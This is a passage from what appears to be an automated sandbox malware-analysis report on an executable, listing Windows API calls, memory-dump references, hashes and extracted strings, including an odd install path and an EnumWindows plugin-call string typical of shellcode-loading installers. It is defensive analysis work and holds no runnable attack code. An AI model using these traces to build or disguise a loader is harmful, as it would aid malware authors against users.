                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00405BC9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                    • String ID: H/B${
                                                                                                                                                                                                                                    • API String ID: 590372296-332483393
                                                                                                                                                                                                                                    • Opcode ID: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                                                                                                                                                                                                    • Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404B41
                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404B6B
                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404C27
                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C59
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404C65
                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77
                                                                                                                                                                                                                                      • Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9
                                                                                                                                                                                                                                      • Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\2T10XBqS6g.exe",75C53420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,?,0000000A,?), ref: 00406993
                                                                                                                                                                                                                                      • Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 004069A2
                                                                                                                                                                                                                                      • Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\2T10XBqS6g.exe",75C53420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,?,0000000A,?), ref: 004069A7
                                                                                                                                                                                                                                      • Part of subcall function 00406930: CharPrevW.USER32(?,?,75C53420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,?,0000000A,?), ref: 004069BA
                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,?,00420F18,?,?,000003FB,?), ref: 00404D3A
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55
                                                                                                                                                                                                                                      • Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                                                                                                                                                                                                      • Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
                                                                                                                                                                                                                                      • Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: A$C:\Users\user\eftermodnendes\ringeagt$Call$H/B$user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                                                                                                    • API String ID: 2624150263-3229018433
                                                                                                                                                                                                                                    • Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                                                                                                                                                                                                    • Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 702512BB: GlobalAlloc.KERNELBASE(?,?,702512DB,?,7025137F,00000019,702511CA,-000000A0), ref: 702512C5
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(?,00001CA4), ref: 70251D2D
                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 70251D75
                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 70251D7F
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70251D92
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 70251E74
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 70251E79
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 70251E7E
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70252068
                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 70252222
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 702522A1
                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 702522B2
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 7025230C
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000808), ref: 70252326
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29621683909.0000000070251000.00000020.00000001.01000000.00000005.sdmp, Offset: 70250000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621638856.0000000070250000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621730229.0000000070254000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621783107.0000000070256000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_70250000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 245916457-0
                                                                                                                                                                                                                                    • Opcode ID: 238aadf2e206278c063415bbadf641412695d3566db0e98614eb28d0e110318d
                                                                                                                                                                                                                                    • Instruction ID: fd456f8ec4054867866b95501287501ba2d3e2c774ee3a72a23a886a4ea8495b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 238aadf2e206278c063415bbadf641412695d3566db0e98614eb28d0e110318d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5322DF73E10206DECB11CFA4C8806EEB7B8FB05315F2045AED566E2280D77899ADDB58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040222E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\eftermodnendes\ringeagt, xrefs: 0040226E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                                    • String ID: C:\Users\user\eftermodnendes\ringeagt
                                                                                                                                                                                                                                    • API String ID: 542301482-2091667457
                                                                                                                                                                                                                                    • Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                                                                                                                                                                                                    • Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                                                                    • Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                                                                                                                                                                                                    • Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00405086
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00405091
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(?,?), ref: 004050DB
                                                                                                                                                                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,?,0040567B), ref: 0040510B
                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 0040511F
                                                                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00405147
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00405165
                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00405168
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A
                                                                                                                                                                                                                                      • Part of subcall function 00404636: SendMessageW.USER32(?,?,?,00404461), ref: 00404644
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,?), ref: 004052AC
                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,?,00000000), ref: 004052BA
                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 004052CA
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 0040543F
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,?), ref: 00405463
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00405498
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004054A8
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,?), ref: 00405604
                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405652
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040565D
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405664
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                    • String ID: $M$N
                                                                                                                                                                                                                                    • API String ID: 2564846305-813528018
                                                                                                                                                                                                                                    • Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                                                                                                                                                                                                    • Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 0040415E
                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,?), ref: 00404170
                                                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 00404189
                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 0040419D
                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 004041D5
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004041F0
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 0040429B
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 004042A5
                                                                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
                                                                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404310
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 004043B6
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 004043D7
                                                                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 004043E9
                                                                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00404404
                                                                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040441A
                                                                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00404421
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,?), ref: 00404439
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00422F48), ref: 0040448A
                                                                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004045BE
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                    • String ID: H/B
                                                                                                                                                                                                                                    • API String ID: 1860320154-184950203
                                                                                                                                                                                                                                    • Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                                                                                                                                                                                                    • Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040485E
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404872
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040488F
                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004048A0
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004048C1
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040493C
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404943
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040496E
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004049C2
                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004049DE
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000111,?,00000000), ref: 00404A0D
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000000,00000000), ref: 00404A1F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                    • String ID: 7G@$Call$N
                                                                                                                                                                                                                                    • API String ID: 3103080414-3155595626
